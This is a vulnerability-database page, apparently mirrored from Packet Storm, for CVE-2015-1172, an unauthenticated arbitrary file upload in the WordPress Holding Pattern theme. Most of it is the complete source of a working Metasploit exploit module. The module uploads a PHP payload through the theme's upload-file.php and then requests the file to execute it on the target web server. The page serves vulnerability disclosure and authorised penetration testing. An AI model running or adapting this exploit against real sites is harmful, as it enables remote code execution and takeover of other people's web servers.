WordPress Holding Pattern Theme Arbitrary File Upload

🗓️ 24 Feb 2015 00:00:00Reported by Alexander BorgType

packetstorm🔗 packetstormsecurity.com👁 40 Views

WordPress Holding Pattern Theme Arbitrary File Upload vulnerability. Allows unauthenticated users to upload and execute PHP scripts

Reporter	Title	Published	Views	Family All 16
0day.today	Wordpress Theme Holding Pattern Arbitrary File Upload Vulnerability	9 Feb 201500:00	–	zdt
0day.today	WordPress Holding Pattern Theme Arbitrary File Upload Exploit	3 Mar 201500:00	–	zdt
Circl	CVE-2015-1172	11 Feb 201500:00	–	circl
CNVD	WordPress Holding Pattern Theme Arbitrary File Upload Vulnerability	10 Feb 201500:00	–	cnvd
Check Point Advisories	WordPress Holding Pattern Theme Arbitrary File Upload (CVE-2015-1172)	19 Feb 201500:00	–	checkpoint_advisories
CVE	CVE-2015-1172	11 Feb 201519:00	–	cve
Cvelist	CVE-2015-1172	11 Feb 201519:00	–	cvelist
Dsquare	WordPress Holding Pattern Theme 0.6 File Upload	17 Feb 201500:00	–	dsquare
Exploit DB	WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)	11 Feb 201500:00	–	exploitdb
Metasploit	WordPress Holding Pattern Theme Arbitrary File Upload	14 Feb 201512:54	–	metasploit

`##  
# This module requires Metasploit: http://www.metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'socket'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FileDropper  
include Msf::HTTP::Wordpress  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload',  
'Description' => %q{  
This module exploits a file upload vulnerability in all versions of the  
Holding Pattern theme found in the upload_file.php script which contains  
no session or file validation. It allows unauthenticated users to upload  
files of any type and subsequently execute PHP scripts in the context of  
the web server.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Alexander Borg', # Vulnerability disclosure  
'Rob Carr <rob[at]rastating.com>' # Metasploit module  
],  
'References' =>  
[  
['CVE', '2015-1172'],  
['WPVDB', '7784'],  
['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']  
],  
'DisclosureDate' => 'Feb 11 2015',  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' => [['holding_pattern', {}]],  
'DefaultTarget' => 0  
))  
end  
  
def rhost  
datastore['RHOST']  
end  
  
def holding_pattern_uploads_url  
normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')  
end  
  
def holding_pattern_uploader_url  
normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')  
end  
  
def generate_mime_message(payload, payload_name)  
data = Rex::MIME::Message.new  
target_ip = IPSocket.getaddress(rhost)  
field_name = Rex::Text.md5(target_ip)  
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")  
data  
end  
  
def exploit  
print_status("#{peer} - Preparing payload...")  
payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"  
data = generate_mime_message(payload, payload_name)  
  
print_status("#{peer} - Uploading payload...")  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => holding_pattern_uploader_url,  
'ctype' => "multipart/form-data; boundary=#{data.bound}",  
'data' => data.to_s  
)  
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?  
fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200  
payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)  
  
print_status("#{peer} - Executing the payload at #{payload_url}")  
register_files_for_cleanup(payload_name)  
send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)  
end  
end  
`

24 Feb 2015 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.81153